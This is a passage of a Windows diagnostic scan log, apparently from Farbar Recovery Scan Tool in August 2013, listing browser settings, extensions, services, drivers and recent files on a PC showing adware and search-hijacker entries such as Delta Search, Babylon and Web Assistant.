SearchScopes: HKCU - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKCU - {69257F85-7DD2-45C1-807F-85414E8ED951} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=HIP&o=102875&src=kw&q={searchTerms}&locale=&apn_ptnrs=^6F&apn_dtid=^YYYYYY^YY^DE&apn_uid=9356c020-5831-4886-b993-34133c28bcb7&apn_sauid=16C594FE-C300-418E-A454-E5100ECDD145
SearchScopes: HKCU - {9BB47C17-9C68-4BB3-B188-DD9AF0FD2413} URL = hxxp://dts.search-results.com/sr?src=ieb&gct=ds&appid=0&systemid=413&apn_dtid=BND413&apn_ptnrs=AGA&o=APN10649&apn_uid=5241357076814249&q={searchTerms}
BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MICROS~3\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~1\MICROS~3\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO: Hotspot Shield Class - {F9E4A054-E9B1-4BC3-83A3-76A1AE736170} -  No File
BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~2\MICROS~2\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Norton Identity Protection - {AB4C7833-A6EC-433f-B9FE-6B14B1A2F836} - C:\Program Files (x86)\Norton Identity Safe\Engine\2013.4.0.10\coIEPlg.dll (Symantec Corporation)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~2\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM-x32 - Norton Identity Safe Toolbar - {A13C2648-91D4-4bf3-BC6D-0079707C4389} - C:\Program Files (x86)\Norton Identity Safe\Engine\2013.4.0.10\coIEPlg.dll (Symantec Corporation)
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1

FireFox:
========
FF ProfilePath: C:\Users\Niklas\AppData\Roaming\Mozilla\Firefox\Profiles\va08g8c0.default
FF user.js: detected! => C:\Users\Niklas\AppData\Roaming\Mozilla\Firefox\Profiles\va08g8c0.default\user.js
FF NewTab: hxxp://www.delta-search.com/?babsrc=NT_ss&mntrId=F22C00FF5CDD2F5B&affID=122471&tt=180613_ndt3&tsp=4921
FF SelectedSearchEngine: Delta Search
FF Homepage: hxxp://search.babylon.com/?babsrc=HP_ss_din2g&mntrId=F22C00FF5CDD2F5B&affID=122471&tt=180613_ndt3&tsp=4921
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF64_11_6_602_180.dll ()
FF Plugin: @java.com/DTPlugin,version=10.25.2 - C:\Windows\system32\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.25.2 - C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files\Microsoft Silverlight\5.1.20513.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_6_602_180.dll ()
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.25.2 - C:\Windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.25.2 - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files (x86)\Microsoft Silverlight\5.1.20513.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.21.153\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.21.153\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF SearchPlugin: C:\Users\Niklas\AppData\Roaming\Mozilla\Firefox\Profiles\va08g8c0.default\searchplugins\askcom.xml
FF SearchPlugin: C:\Users\Niklas\AppData\Roaming\Mozilla\Firefox\Profiles\va08g8c0.default\searchplugins\MyStart Search.xml
FF SearchPlugin: C:\Users\Niklas\AppData\Roaming\Mozilla\Firefox\Profiles\va08g8c0.default\searchplugins\Search_Results.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\amazondotcom-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\eBay-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\leo_ende_de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\wikipedia-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\yahoo-de.xml
FF Extension: No Name - C:\Users\Niklas\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}
FF Extension: betterads - C:\Users\Niklas\AppData\Roaming\Mozilla\Firefox\Profiles\va08g8c0.default\Extensions\betterads@BetterAds.org.xpi
FF Extension: toolbar_AVIRA-V7 - C:\Users\Niklas\AppData\Roaming\Mozilla\Firefox\Profiles\va08g8c0.default\Extensions\toolbar_AVIRA-V7@apn.ask.com.xpi
FF Extension: Default - C:\Program Files (x86)\Mozilla Firefox\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA}
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA}
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA}
FF HKLM\...\Firefox\Extensions: [{336D0C35-8A85-403a-B9D2-65C292C39087}] C:\Program Files\Web Assistant\Firefox
FF Extension: Web Assistant - C:\Program Files\Web Assistant\Firefox
FF HKLM\...\Firefox\Extensions: [{FE1DEEEA-DB6D-44b8-83F0-34FC0F9D1052}] C:\Program Files\Web Assistant\Firefox
FF Extension: Web Assistant - C:\Program Files\Web Assistant\Firefox
FF HKLM\...\Firefox\Extensions: [{8E9E3331-D360-4f87-8803-52DE43566502}] C:\Program Files\Web Assistant\Firefox
FF Extension: Web Assistant - C:\Program Files\Web Assistant\Firefox
FF HKLM-x32\...\Firefox\Extensions: [{336D0C35-8A85-403a-B9D2-65C292C39087}] C:\Program Files\Web Assistant\Firefox
FF Extension: Web Assistant - C:\Program Files\Web Assistant\Firefox
FF HKLM-x32\...\Firefox\Extensions: [webbooster@iminent.com] C:\Program Files (x86)\Iminent\webbooster@iminent.com
FF HKLM-x32\...\Firefox\Extensions: [{FE1DEEEA-DB6D-44b8-83F0-34FC0F9D1052}] C:\Program Files\Web Assistant\Firefox
FF Extension: Web Assistant - C:\Program Files\Web Assistant\Firefox
FF HKLM-x32\...\Firefox\Extensions: [{F04D2D30-776C-4d02-8627-8E4385ECA58D}] C:\ProgramData\Norton\{92622AAD-05E8-4459-B256-765CE1E929FB}\NST_2013.4.0.10\coFFPlgn\
FF Extension: Norton Identity Safe Toolbar - C:\ProgramData\Norton\{92622AAD-05E8-4459-B256-765CE1E929FB}\NST_2013.4.0.10\coFFPlgn\
FF HKLM-x32\...\Firefox\Extensions: [{8E9E3331-D360-4f87-8803-52DE43566502}] C:\Program Files\Web Assistant\Firefox
FF Extension: Web Assistant - C:\Program Files\Web Assistant\Firefox

Chrome: 
=======
CHR HomePage: hxxp://www.searchnu.com/413
CHR RestoreOnStartup: "hxxp://www.google.de/ig?hl=de&source=webhp"
CHR DefaultSearchURL: (Google) - {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}ie={inputEncoding}
CHR DefaultSuggestURL: (Google) - {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client=chrome&q={searchTerms}&{google:cursorPosition}{google:zeroPrefixUrl}sugkey={google:suggestAPIKeyParameter}
CHR Plugin: (Remoting Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\28.0.1500.95\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\28.0.1500.95\pdf.dll ()
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\28.0.1500.95\gcswf32.dll No File
CHR Plugin: (Shockwave Flash) - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.111\npGoogleUpdate3.dll No File
CHR Plugin: (Java(TM) Platform SE 6 U31) - C:\Program Files (x86)\Java\jre6\bin\plugin2\npjp2.dll No File
CHR Plugin: (Silverlight Plug-In) - C:\Program Files (x86)\Microsoft Silverlight\4.0.60831.0\npctrl.dll No File
CHR Plugin: (NVIDIA 3D Vision) - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
CHR Plugin: (NVIDIA 3D VISION) - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
CHR Plugin: (Windows Live\u0099 Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Extension: (ProxTube) - C:\Users\Niklas\AppData\Local\Google\Chrome\User Data\Default\Extensions\aakchaleigkohafkfjfjbblobjifikek\1.2.3_0
CHR Extension: (Angry Birds) - C:\Users\Niklas\AppData\Local\Google\Chrome\User Data\Default\Extensions\aknpkdffaafgjchaibgeefbgmgeghloj\1.5.0.7_0
CHR Extension: (Chrome YouTube Downloader) - C:\Users\Niklas\AppData\Local\Google\Chrome\User Data\Default\Extensions\cbdjiinahkdjdcdlgfimlcolkjpbooja\2.6.16_0
CHR Extension: (Give Up) - C:\Users\Niklas\AppData\Local\Google\Chrome\User Data\Default\Extensions\diippoclinjdbklinhchgedilfncehbi\1.0.0_0
CHR Extension: (AdBlock) - C:\Users\Niklas\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom\2.6.4_0
CHR Extension: (JavaScript Popup Blocker) - C:\Users\Niklas\AppData\Local\Google\Chrome\User Data\Default\Extensions\hiajdlfgbgnnjakkbnpdhmhfhklkbiol\1.2.4_0
CHR Extension: (Isoball 3) - C:\Users\Niklas\AppData\Local\Google\Chrome\User Data\Default\Extensions\iajlkcpgcnbhfhpdeooockfaincfkjjj\1.3.0_0
CHR Extension: (hxxp://www.youtube.com/watch?v=t_kCJlBtCEs) - C:\Users\Niklas\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljfocndbiglbiapfibmabbdplngmpcih\2012.10.6.49541_0
CHR Extension: (Norton Identity Protection) - C:\Users\Niklas\AppData\Local\Google\Chrome\User Data\Default\Extensions\nppllibpnmahfaklnpggkibhkapjkeob\2013.4.0.10_0
CHR HKLM\...\Chrome\Extension: [dlnembnfbcpjnepmfjmngjenhhajpdfd] - C:\Program Files\Web Assistant\source.crx
CHR HKLM-x32\...\Chrome\Extension: [cacclhdpfoingihegojhoipnihfnoaki] - C:\Users\Niklas\AppData\Local\MediaBA\betterads.crx
CHR HKLM-x32\...\Chrome\Extension: [cgiaikfpllchefojlnehlmpekeogihnm] - C:\Users\Niklas\AppData\Local\CRE\cgiaikfpllchefojlnehlmpekeogihnm.crx
CHR HKLM-x32\...\Chrome\Extension: [dednnpigldgdbpgcdpfppmlcnnbjciel] - C:\Users\Niklas\AppData\Roaming\Media Finder\Extensions\gencrawler_gc.crx
CHR HKLM-x32\...\Chrome\Extension: [dlnembnfbcpjnepmfjmngjenhhajpdfd] - C:\Program Files\Web Assistant\source.crx
CHR HKLM-x32\...\Chrome\Extension: [fgjmgaonhcgbelpohkmegjaneegiigil] - C:\ProgramData\wxDfast\fgjmgaonhcgbelpohkmegjaneegiigil.crx
CHR HKLM-x32\...\Chrome\Extension: [lpmkgpnbiojfaoklbkpfneikocaobfai] - C:\Users\Niklas\AppData\Roaming\Media Finder\Extensions\mf_plugin_gc.crx
CHR HKLM-x32\...\Chrome\Extension: [nppllibpnmahfaklnpggkibhkapjkeob] - C:\Program Files (x86)\Norton Identity Safe\Engine\2013.4.0.10\Exts\Chrome.crx

==================== Services (Whitelisted) =================

R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [84024 2013-08-18] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [108088 2013-08-18] (Avira Operations GmbH & Co. KG)
S4 AntiVirWebService; C:\Program Files (x86)\Avira\AntiVir Desktop\AVWEBGRD.EXE [589368 2013-08-18] (Avira Operations GmbH & Co. KG)
S4 BroadCamService; C:\Program Files (x86)\NCH Software\BroadCam\broadcam.exe [2584068 2012-07-26] (NCH Software)
S2 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [393032 2013-07-17] (BlueStack Systems, Inc.)
R2 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [384840 2013-07-17] (BlueStack Systems, Inc.)
S4 CyberLink PowerDVD 10 MS Monitor Service; C:\Program Files (x86)\CyberLink\PowerDVD10\Device\MediaServer\CLMSMonitorService.exe [70952 2011-04-14] (CyberLink)
S4 CyberLink PowerDVD 10 MS Service; C:\Program Files (x86)\CyberLink\PowerDVD10\Device\MediaServer\CLMSServer.exe [312616 2011-04-14] (CyberLink)
R2 MSSQL$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe [57617752 2009-03-30] (Microsoft Corporation)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [340240 2011-09-16] ()
R2 NCO; C:\Program Files (x86)\Norton Identity Safe\Engine\2013.4.0.10\ccSvcHst.exe [144368 2013-05-21] (Symantec Corporation)
R2 RichVideo; C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe [244904 2010-12-14] ()
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1817560 2013-05-16] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [1033688 2013-05-16] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2013-05-15] (Safer-Networking Ltd.)
S4 SQLAgent$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [427880 2009-03-30] (Microsoft Corporation)
R3 SystemExplorerHelpService; C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe [821720 2012-11-25] (Mister Group)
R2 TuneUp.UtilitiesSvc; C:\Program Files (x86)\TuneUp Utilities 2013\TuneUpUtilitiesService64.exe [2402080 2013-01-28] (TuneUp Software)
S4 watchmi; C:\Program Files (x86)\watchmi\TvdService.exe [70144 2012-01-31] ()
R2 Web Assistant; C:\Program Files\Web Assistant\ExtensionUpdaterService.exe [188760 2013-06-30] ()
R2 Web Assistant Updater; C:\Program Files\Web Assistant\ExtensionUpdaterService.exe [188760 2013-06-30] ()
R3 WisLMSvc; C:\Program Files (x86)\Launch Manager\WisLMSvc.exe [118560 2011-08-06] (Wistron Corp.)
R2 ZcfgSvc7; C:\Program Files\Intel\WiFi\bin\ZCfgSvc7.exe [994064 2011-09-16] (Intel(R) Corporation)

==================== Drivers (Whitelisted) ====================

R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [100712 2013-08-18] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [130016 2013-08-18] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-08-18] (Avira Operations GmbH & Co. KG)
R2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [70984 2013-07-17] (BlueStack Systems)
R2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [70984 2013-07-17] (BlueStack Systems)
R1 ccSet_NST; C:\Windows\system32\drivers\NSTx64\7DD04000.00A\ccSetx64.sys [169048 2013-04-16] (Symantec Corporation)
R1 HssDRV6; C:\Windows\System32\DRIVERS\hssdrv6.sys [42696 2013-01-20] (AnchorFree Inc.)
S3 IT9135BDA; C:\Windows\System32\Drivers\IT9135BDA.sys [158464 2011-10-27] (ITE                      )
S3 MEMSWEEP2; C:\Windows\system32\1D5F.tmp [6144 2009-06-18] (Sophos Plc)
S3 MEMSWEEP2; C:\Windows\system32\1D5F.tmp [6144 2009-06-18] (Sophos Plc)
R2 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-03-01] (Riverbed Technology, Inc.)
R3 taphss6; C:\Windows\System32\DRIVERS\taphss6.sys [42328 2013-01-05] (Anchorfree Inc.)
R3 TuneUpUtilitiesDrv; C:\Program Files (x86)\TuneUp Utilities 2013\TuneUpUtilitiesDriver64.sys [11880 2012-11-16] (TuneUp Software)
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [x]
S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [x]

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2013-08-22 11:31 - 2013-08-22 11:31 - 00000000 ____D C:\FRST
2013-08-22 11:31 - 2013-08-22 11:29 - 01576476 _____ (Farbar) C:\Users\Niklas\Desktop\FRST64.exe
2013-08-22 11:29 - 2013-08-22 11:29 - 01576476 _____ (Farbar) C:\Users\Niklas\Downloads\FRST64.exe
2013-08-21 18:48 - 2013-08-21 18:48 - 00003836 _____ C:\Users\Niklas\Downloads\fgjmgaonhcgbelpohkmegjaneegiigil.crx
2013-08-21 18:42 - 2013-08-21 18:43 - 00266843 _____ C:\ProgramData\GBox.rar
2013-08-21 18:40 - 2013-08-21 18:40 - 00001090 _____ C:\Users\Public\Desktop\System Explorer.lnk
2013-08-21 18:36 - 2013-08-21 18:36 - 02061008 _____ (Mister Group                                                ) C:\Users\Niklas\Downloads\SystemExplorerSetup_422 (2).exe
2013-08-21 14:33 - 2013-08-21 14:37 - 00000000 ____D C:\Users\Niklas\Desktop\php
2013-08-21 14:25 - 2013-08-21 14:32 - 148380279 _____ C:\Users\Niklas\Downloads\eclipse-php-helios-SR2-win32-x86_64.zip
2013-08-21 13:39 - 2013-08-21 13:39 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Avira
2013-08-21 13:34 - 2013-08-21 13:34 - 00083672 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avnetflt.sys
2013-08-21 13:33 - 2013-08-21 13:33 - 00001998 _____ C:\Users\Public\Desktop\Avira Control Center.lnk
2013-08-21 13:32 - 2013-08-21 13:32 - 00000000 ____D C:\Program Files (x86)\Avira
2013-08-21 13:32 - 2013-08-18 14:16 - 00130016 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avipbb.sys
2013-08-21 13:32 - 2013-08-18 14:16 - 00100712 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avgntflt.sys
2013-08-21 13:32 - 2013-08-18 14:16 - 00028600 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avkmgr.sys
2013-08-18 18:38 - 2013-07-26 07:13 - 02241024 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2013-08-18 18:38 - 2013-07-26 07:13 - 01365504 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2013-08-18 18:38 - 2013-07-26 07:13 - 00051712 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2013-08-18 18:38 - 2013-07-26 07:12 - 19239424 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2013-08-18 18:38 - 2013-07-26 07:12 - 15405056 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2013-08-18 18:38 - 2013-07-26 07:12 - 03958784 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2013-08-18 18:38 - 2013-07-26 07:12 - 02647040 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2013-08-18 18:38 - 2013-07-26 07:12 - 00855552 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2013-08-18 18:38 - 2013-07-26 07:12 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2013-08-18 18:38 - 2013-07-26 07:12 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2013-08-18 18:38 - 2013-07-26 07:12 - 00136704 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2013-08-18 18:38 - 2013-07-26 07:12 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2013-08-18 18:38 - 2013-07-26 07:12 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2013-08-18 18:38 - 2013-07-26 07:12 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2013-08-18 18:38 - 2013-07-26 05:35 - 02706432 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2013-08-18 18:38 - 2013-07-26 05:13 - 01767936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2013-08-18 18:38 - 2013-07-26 05:13 - 01141248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2013-08-18 18:38 - 2013-07-26 05:12 - 14329344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2013-08-18 18:38 - 2013-07-26 05:12 - 02877440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2013-08-18 18:38 - 2013-07-26 05:12 - 02048512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2013-08-18 18:38 - 2013-07-26 05:12 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2013-08-18 18:38 - 2013-07-26 05:12 - 00493056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2013-08-18 18:38 - 2013-07-26 05:12 - 00391168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2013-08-18 18:38 - 2013-07-26 05:12 - 00109056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesysprep.dll
2013-08-18 18:38 - 2013-07-26 05:12 - 00061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2013-08-18 18:38 - 2013-07-26 05:12 - 00039936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2013-08-18 18:38 - 2013-07-26 05:11 - 13761024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2013-08-18 18:38 - 2013-07-26 05:11 - 00033280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2013-08-18 18:38 - 2013-07-26 04:49 - 02706432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2013-08-18 18:38 - 2013-07-26 04:39 - 00089600 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe
2013-08-18 18:38 - 2013-07-26 03:59 - 00071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RegisterIEPKEYs.exe
2013-08-18 17:32 - 2013-07-09 08:03 - 05550528 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2013-08-18 17:32 - 2013-07-09 07:54 - 01732032 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2013-08-18 17:32 - 2013-07-09 07:53 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2013-08-18 17:32 - 2013-07-09 07:03 - 03968960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2013-08-18 17:32 - 2013-07-09 07:03 - 03913664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2013-08-18 17:32 - 2013-07-09 06:53 - 01292192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2013-08-18 17:32 - 2013-07-09 06:52 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2013-08-18 17:32 - 2013-07-09 04:49 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2013-08-18 17:32 - 2013-07-09 04:49 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2013-08-18 17:32 - 2013-07-09 04:49 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2013-08-18 17:32 - 2013-07-09 04:49 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2013-08-18 17:18 - 2013-08-18 17:26 - 133456378 _____ C:\Users\Niklas\Downloads\Dragon Quest IX Hüter Des Himmels.rar
2013-08-18 14:16 - 2013-08-18 14:16 - 02717364 _____ C:\Users\Niklas\Downloads\TwilightForest Mod 1.5.2.zip
2013-08-18 14:02 - 2013-07-09 07:52 - 00224256 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2013-08-18 14:02 - 2013-07-09 07:46 - 01472512 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2013-08-18 14:02 - 2013-07-09 07:46 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2013-08-18 14:02 - 2013-07-09 07:46 - 00139776 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2013-08-18 14:02 - 2013-07-09 06:52 - 00175104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2013-08-18 14:02 - 2013-07-09 06:46 - 01166848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2013-08-18 14:02 - 2013-07-09 06:46 - 00140288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
